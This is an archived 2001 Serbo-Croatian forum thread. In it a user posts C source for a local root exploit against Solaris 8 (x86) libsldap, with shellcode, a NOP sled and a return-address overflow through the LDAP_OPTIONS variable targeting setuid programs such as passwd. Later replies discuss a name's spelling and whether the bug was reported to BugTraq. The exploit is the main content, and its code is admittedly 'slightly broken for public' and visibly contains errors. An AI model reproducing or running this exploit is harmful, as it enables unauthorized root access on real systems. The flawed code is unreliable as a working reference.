[ slash @ 17.07.2001. 12:53 ] @
Inace svoje exploite drzim za sebe ali ovoga sam udlucio releasati.
http://anti.security.is

Napisao sam i exploit za SPARC pa koga zanima neka me maila.

/*
* Local Solaris 8 (x86) libsldap Exploit
* by slash <[email protected]>
*
* argv[1] can be passwd, yppasswd, nispasswd, sendmail
* chkey etc. Use the ldd command to find more programs
* that are linked agains libsldap library. Maybee it would
* be a good idea to play with the overflow egg by changing
* the buffer size or RETPOS.
*
* Word up to Adam Beyer, Cris Liebing and Gayle San that
* played @ Rotor 2001 - Experience
*
* PRIVATE !!! DO NOT DISTRIBUTE !!! PRIVATE !!!
*
* *note* slightly broken for public
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define SIZE 331
#define NOP 0x90
#define RETPOS 251
#define ENV "LDAP_OPTIONS"

char shellcode[] =
"xebx1cx5ex33xc0x33xdbxb3x08xfexc3x2bxf3x88x06"
"x6ax06x50xb0x88x9axffxffxffxffx07xeexebx06x90"
"xe8xdfxffxffxffx55x8bxecx83xecx08xebx5dx33xc0"
"xb0x3axfexc0xebx16xc3x33xc0x40xebx10xc3x5ex33"
"xdbx89x5ex01xc6x46x05x07x88x7ex06xebx05xe8xec"
"xffxffxffx9axffxffxffxffx0fx0fxc3x5ex33xc0x89"
"x76x08x88x46x07x33xd2xb2x06x02xd2x89x04x16x50"
"x8dx46x08x50x8bx46x08x50xe8xb5xffxffxffx33xd2"
"xb2x06x02xd2x03xe2x6ax01xe8xafxffxffxffx83xc4"
"x04xe8xc9xffxffxffx2fx74x6dx70x2fx78x78";

unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}

int main (int argc, char *argv[])
{
char buffer[SIZE];
char *program;
int i, offset;
unsigned long ret;

if (argc < 2) {
printf ("Usage: %s </path/to/program> <offset> <ret>n", argv[0]);
}
printf ("Local Solaris 8 (x86) libsldap Exploitn");
printf ("by slash <[email protected]>nn");

offset = atoi(argv[2]);
program = atoi(argv[1]);

if (argc < 3)
{
ret = get_sp();
} else
{
ret = argv[3];
//sanity cheq
if(!(ret & 0xff) | | !(ret & 0xff00) | |
!(ret & 0xff0000) | | !(ret & 0xff000000))
{
printf("Your return address contains a zero-byte !");
exit(EXIT_FAILURE);
}
}
for (i = 0; i < 250 - strlen(shellcode); i++) {
*buffer = NOP;
}
for (i = 250 - strlen(shellcode); i < 250; i++) {
*buffer = shellcode;
}
for (i = RETPOS; i < SIZE; i = i + 4) {
*(long *)&buffer = ret + offset;
}
printf ("Offset [%d] - Return Address [0x%x]n", offset, ret + offset);
system ("/bin/ln -s /bin/ksh /tmp/xx");
setenv (ENV, buffer, 1);
execl (program, "1337", 0);
}



[ UroS @ 20.07.2001. 16:39 ] @
ne pishe se cris liebing nego chris liebing...
[ slash @ 21.07.2001. 10:57 ] @
Citat:
UroS je napisao:
ne pishe se cris liebing nego chris liebing...



tocno :) my bad :)
[ Mikky @ 16.08.2001. 16:05 ] @
a jesi obavestio open source zajednicu za ovu rupu i uopste kad nadjes sam neku ranjivost da li obavestavas proizvodjaca da izda patch
ili cutis i cuvas exploit pa kad zatreba koristis?
[ Vojislav Milunovic @ 16.08.2001. 19:57 ] @
Pa bilo je o ovoj rupi na BugTraq...samo treba da se prati lista ;o)
[ Mikky @ 16.08.2001. 22:32 ] @
znaci slash je otkrio i prijavio bugtraqu
ako je tako svaka cast
[ Vojislav Milunovic @ 17.08.2001. 02:31 ] @
E da li ga je otkrio to ne znam,to ces morati njega da pitas ;o) mada mogu da pogledam na securityfocus.com ko ga je naso ;o)
[ Vojislav Milunovic @ 17.08.2001. 02:36 ] @
http://www.securityfocus.com/archive/1/195015

evo ti link pa citaj ko je i kako je otkrio bug,to je bilo na BugTraq